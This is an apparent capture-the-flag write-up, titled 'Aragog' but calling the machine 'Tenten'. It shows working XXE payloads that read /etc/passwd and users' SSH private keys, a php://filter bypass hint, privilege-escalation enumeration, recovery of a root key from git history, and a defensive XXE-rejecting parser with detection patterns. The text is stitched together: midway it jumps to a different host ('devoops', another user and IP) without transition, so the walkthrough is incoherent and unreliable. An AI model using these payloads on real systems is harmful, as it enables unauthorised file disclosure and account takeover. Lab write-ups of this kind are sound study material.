Aragog

#Linux #Web #Wordpress #XXE

Tenten is a medium-rated Linux machine from HackTheBox created by egre55. In the current post, my IP is 10.10.14.76, and the target's IP is 10.129.102.78.

Recon

Local Terminal
> ping -c 1 10.129.102.78

PING 10.129.102.78 (10.129.102.78) 56(84) bytes of data.
64 bytes from 10.129.102.78: icmp_seq=1 ttl=63 time=260 ms

--- 10.129.102.78 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 260.032/260.032/260.032/0.000 ms

The machine is alive, and the TTL (63, just under 64) suggests that the target is a Linux machine.

Local Terminal
nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.129.102.78 -oN AllPorts
Nmap scan report for 10.129.102.78
Host is up, received user-set (0.26s latency).
Scanned at 2023-09-14 11:22:03 -03 for 21s
Not shown: 65487 closed ports, 45 filtered ports
Reason: 65487 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 62
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
Local Terminal
nmap -sCV -p 21,22,80 10.129.102.78 -oN Target
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-14 11:22 -03
Nmap scan report for 10.129.102.78
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.76
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Two of the open ports reveal the OS release. For port 22 (SSH), searching "OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 launchpad" shows that the target is Ubuntu Xenial, and for port 80 (the web server), searching "Apache httpd 2.4.18 launchpad" confirms Ubuntu Xenial.

Both point to the same release, so it is much less likely that the web service runs in a separate Docker container.

Port 80 redirects to http://aragog.htb/, so add the hostname to /etc/hosts and launch another nmap scan.

Port 21 - FTP

Local Terminal
> ftp 10.129.102.78
Connected to 10.129.102.78.
220 (vsFTPd 3.0.3)
Name (10.129.102.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
229 Entering Extended Passive Mode (|||46497|)
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||46086|)
150 Opening BINARY mode data connection for test.txt (86 bytes).
100% |*********************************************************************************************************|    86      237.91 KiB/s    00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (0.33 KiB/s)

ftp> exit
221 Goodbye.

> cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

It looks like an XML file with custom tags.

Port 80

> whatweb http://aragog.htb
http://aragog.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.78], 
Title[Apache2 Ubuntu Default Page: It works]

Nothing useful from whatweb, but now we know that it serves the Apache2 Ubuntu default page.

With nothing else to go on, let's fuzz for html and php files.

Local Terminal
wfuzz -c --hc=404 --hw=28 -t 200 -w /opt/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-html http://aragog.htb/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://aragog.htb/FUZZ.FUZ2Z
Total requests: 441092

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000002:   200        375 L    968 W      11321 Ch    "index - html"
000012013:   200        3 L      6 W        46 Ch       "hosts - php"

hosts.php shows up; maybe it is related to the other file we found, test.txt. Files can be sent to it with a POST request, of course.

Local Terminal
> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It parses the XML, so let's see whether the output of an XXE payload is reflected.

exploit.txt
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
Local Terminal
> curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<...>
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
<...>

And it works! Additionally, /etc/passwd gives us a successful user enumeration: look for the accounts that have /bin/bash as their shell.

[+] root + florian + cliff

Or you can use:

curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php | grep "sh$"
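As an added example (not code from the writeup or from the box), a hardened Python equivalent of hosts.php: it labels the request body for logging, refuses any DOCTYPE before the parser sees it, and validates the mask so a bad value yields an error instead of a bogus count. The request bodies are constructed from the test.txt and exploit.txt files shown above.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Constructed request bodies mirroring test.txt and exploit.txt from the post.
BENIGN_BODY = """<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>"""
XXE_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# General or parameter entity with an external (SYSTEM/PUBLIC) identifier.
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def classify_body(body: str) -> str:
    """Detection side: a label for the WAF or application log."""
    if EXTERNAL_ENTITY_RE.search(body):
        return "xxe-external-entity"
    if DOCTYPE_RE.search(body):
        return "doctype-present"
    return "clean"


def handle_request(body: str) -> dict:
    """Hardened hosts.php equivalent. The endpoint never needs a DTD, so any
    DOCTYPE is rejected before parsing; the stdlib parser is then used without
    entity expansion, and the mask is validated explicitly."""
    label = classify_body(body)
    if label != "clean":
        return {"status": 400, "label": label, "body": "DOCTYPE and entity declarations are not accepted"}
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return {"status": 400, "label": label, "body": f"malformed XML: {exc}"}
    mask = (root.findtext("subnet_mask") or "").strip()
    try:
        net = ipaddress.IPv4Network(("0.0.0.0", mask))
    except ValueError:
        # A silently failed mask conversion is what produced "4294967294 possible hosts" above.
        return {"status": 400, "label": label, "body": f"invalid subnet mask: {mask!r}"}
    usable = max(net.num_addresses - 2, 0)
    return {"status": 200, "label": label, "body": f"There are {usable} possible hosts for {mask}"}
```

On the original endpoint a non-mask string silently became "4294967294 possible hosts", so that response string is itself worth alerting on in web logs.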

Exploitation

First, let's see what else we can read: florian's SSH private key is a good target.

exploit_two.txt
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>
Local Terminal
curl -s -X POST -d @exploit_two.txt http://aragog.htb/hosts.php
Output
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----

Reverse Shell

Local Terminal
> chmod 600 id_rsa
> ssh -i id_rsa florian@10.129.102.78

florian@aragog:~$ whoami
florian
florian@aragog:~$ cat user.txt

It works!

Privilege Escalation

Target Terminal [florian]
florian@aragog:~$ id
uid=1000(florian) gid=1000(florian) groups=1000(florian)

florian@aragog:~$ cd /
florian@aragog:/$ find \-perm -4000 2>/dev/null
./bin/su
./bin/mount
<...>

florian@aragog:/$ getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

florian@aragog:/$  cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Nothing interesting here, so let's look for recurring processes with pspy or with a small procmon script run from /tmp.

procmon.sh
#!/bin/bash
# Poll the process list and print the commands that appear or disappear,
# to spot cron jobs and other periodic tasks.

function ctrl_c(){
	echo -e "\n[!] Exit [!]\n"
	exit 1
}

# Ctrl+C
trap ctrl_c INT

old_process=$(ps -eo command)

while true; do
	new_process=$(ps -eo command)
	# Lines starting with < or > are processes that vanished or appeared since the last poll
	diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon|command|kworker"
	old_process=$new_process
done

First, upload a dummy file to see how it reacts (vi test.xml), then create the proper XML file (vi exploit.xml).

test.xml
Testing
exploit.xml
<elements>
        <Author>Tartox</Author>
        <Subject>String</Subject>
        <Content>Stringtwo</Content>
</elements>

From here we get a lot of information. First, the output is reflected, which means an XXE is possible; second, there is a user called "roosa" on the system.

Exploitation

Let's see if the exploit works: create the file with vi exploit_proof.xml, then upload it.

exploit_proof.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

Perfect, it works. Remember that with Ctrl+U (view source) the targeted file is displayed in a more readable format.

Now it is time to exploit: upload exploit_exec.xml.

exploit_exec.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

On many machines this exploit fails; an alternative in those situations, when the target uses PHP, is a PHP wrapper such as "php://filter/convert.base64-encode/resource=/var/www/html/index.php" after SYSTEM.

Reverse Shell - roosa

Perfect, we can read the id_rsa.

id_rsa
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----
Local Terminal
> chmod 600 id_rsa
> ssh -i id_rsa roosa@10.129.102.140


Target Terminal [roosa]
roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt
2d8b779192e11e67d6d8f2039338a37f

Privilege Escalation

Target Terminal [roosa]
roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
# With the adm group you can read the system logs: ls -l /var/log

roosa@devoops:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial #Nice

roosa@devoops:~$ ls -la
total 156
<...>
drwx------  3 root  root  4096 Mar 26  2021 .dbus
drwxrwxr-x  4 roosa roosa 4096 Mar 26  2021 deploy
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Desktop
-rw-r--r--  1 roosa roosa   25 Mar 21  2018 .dmrc
<...>
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Templates
-r--------  1 roosa roosa   33 Sep 13 15:04 user.txt
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Videos
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 work
<...>

A lot of files, but there are two curious folders, deploy and work. Let's check work.

Target Terminal [roosa]
roosa@devoops:~$ cd work
roosa@devoops:~/work$ ls -la
total 12
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 .
drwxr-xr-x 22 roosa roosa 4096 Sep 23  2022 ..
drwxrwx---  5 roosa roosa 4096 Mar 26  2021 blogfeed

roosa@devoops:~/work$ cd blogfeed
roosa@devoops:~/work/blogfeed$ ls -la
total 28
drwxrwx--- 5 roosa roosa 4096 Mar 26  2021 .
drwxrwxr-x 3 roosa roosa 4096 Mar 26  2021 ..
drwxrwx--- 8 roosa roosa 4096 Mar 26  2021 .git
-rw-rw---- 1 roosa roosa  104 Mar 19  2018 README.md
drwxrwx--- 3 roosa roosa 4096 Mar 26  2021 resources
-rwxrw-r-- 1 roosa roosa  180 Mar 21  2018 run-gunicorn.sh
drwxrwx--- 2 roosa roosa 4096 Mar 26  2021 src

Good, there is a git repository; in those cases it is always good practice to review the commit history for old sensitive information... ALWAYS! But first, let's check whether there are other hidden files here.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ find .
.
./run-gunicorn.sh
./resources
./resources/integration
./resources/integration/authcredentials.key
./.git
./.git/objects
./.git/objects/33
./.git/objects/33/e87c312c08735a02fa9c796021a4a3023129ad
<...>

A file with credentials?

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cat ./resources/integration/authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----

Another private key; go to /home to check for more users.

Another way to list the users with a bash shell is to read /etc/passwd and check who has "bash" as their shell.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ cd /home

roosa@devoops:/home$ ls -la
total 28
drwxr-xr-x  7 root     root     4096 Mar 26  2021 .
drwxr-xr-x 23 root     root     4096 Sep 23  2022 ..
drwxr-xr-x  2 blogfeed blogfeed 4096 Mar 26  2021 blogfeed
drwxr-xr-x  4 git      git      4096 Sep 23  2022 git
drwx------  2 root     root     4096 Mar 26  2021 lost+found
drwxr-xr-x 16 osboxes  osboxes  4096 Mar 26  2021 osboxes
drwxr-xr-x 22 roosa    roosa    4096 Sep 23  2022 roosa

Several users to test the key against; if it is not the correct one, we should check past commits for mistakes.

Copy authcredentials.key as id_rsa to the /tmp folder, then connect through ssh.

Target Terminal [roosa]
roosa@devoops:/home$ cd /tmp
roosa@devoops:/tmp$ cp /home/roosa/work/blogfeed/resources/integration/authcredentials.key /tmp/id_rsa
roosa@devoops:/tmp$ chmod 600 id_rsa
roosa@devoops:/tmp$ ssh -i id_rsa root@localhost
    # It asks for a password with every user, so forget about this key.

Return to the blogfeed folder with cd /home/roosa/work/blogfeed

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log

"reverted accidental commit with proper key" looks like an interesting mistake; copy the commit hash.

Target Terminal [roosa]
roosa@devoops:~/work/blogfeed$ git log -p 33e87c312c08735a02fa9c796021a4a3023129ad

It shows a deleted private key (the removed lines, shown in red); save it in /tmp and try to use it.

id_rsa_two
-----BEGIN RSA PRIVATE KEY-----
<...>
-----END RSA PRIVATE KEY-----
Target Terminal [roosa]
roosa@devoops:/tmp$ chmod 600 id_rsa_two
roosa@devoops:/tmp$ ssh -i id_rsa_two root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# cat root.txt

And it works, the machine is done.
